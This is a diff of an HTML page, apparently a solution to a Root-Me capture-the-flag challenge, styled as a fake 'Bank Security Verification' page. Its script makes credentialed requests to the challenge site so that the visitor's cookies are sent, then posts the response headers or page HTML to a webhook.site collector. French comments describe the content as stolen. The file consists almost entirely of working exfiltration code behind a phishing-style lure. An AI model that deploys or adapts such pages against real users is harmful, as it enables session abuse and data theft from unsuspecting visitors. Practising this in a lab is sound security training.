--- a/steal_headers.html
+++ b/steal_headers.html
@@ -1,59 +1,41 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <title>Bank Security Check</title>
+    <title>Security Update Required</title>
   </head>
   <body>
     <h1>Bank Security Verification</h1>
-    <p>Please wait while we verify your account...</p>
+    <p>Please wait while we verify your account security...</p>
 
     <script>
-      // Webhook URL - remplacez par votre URL de réception
-      const webhookURL =
-        "https://webhook.site/619dc24e-b59e-4424-8632-84b2c38413c5";
+      // Quand un membre du Rich Club visite cette page:
+      fetch(
+        "https://instance-019a183e-f399-712e-acfd-1a4939b3c52d.challenges.root-me.pro/rich-club",
+        {
+          method: "GET",
+          credentials: "include", // Envoie automatiquement les cookies ET headers
+        }
+      )
+        .then((response) => response.text())
+        .then((html) => {
+          // Envoyer le contenu volé à votre webhook
+          const webhookURL =
+            "https://webhook.site/619dc24e-b59e-4424-8632-84b2c38413c5";
 
-      // Fonction pour envoyer les headers
-      function stealHeaders() {
-        // Faire une requête vers le site bancaire
-        fetch(
-          "https://instance-019a183e-f399-712e-acfd-1a4939b3c52d.challenges.root-me.pro/contact?username=l0ve_0racle_l4rry&message=1",
-          {
-            method: "GET",
-            credentials: "include", // inclut les cookies
-          }
-        )
-          .then((response) => {
-            // Récupérer tous les headers de la réponse
-            const headers = {};
-            for (const [key, value] of response.headers.entries()) {
-              headers[key] = value;
-            }
-
-            // Envoyer les headers au webhook
-            return fetch(webhookURL, {
-              method: "POST",
-              headers: {
-                "Content-Type": "application/json",
-              },
-              body: JSON.stringify({
-                url: response.url,
-                status: response.status,
-                headers: headers,
-                timestamp: new Date().toISOString(),
-              }),
-            });
-          })
-          .then(() => {
-            document.body.innerHTML += "<p>Verification complete!</p>";
-          })
-          .catch((error) => {
-            console.error("Error:", error);
+          fetch(webhookURL, {
+            method: "POST",
+            headers: {
+              "Content-Type": "application/json",
+            },
+            body: JSON.stringify({
+              stolenContent: html,
+              timestamp: new Date().toISOString(),
+            }),
           });
-      }
-
-      // Exécuter quand la page charge
-      window.onload = stealHeaders;
+        })
+        .catch((err) => {
+          console.error("Error:", err);
+        });
     </script>
   </body>
 </html>
-
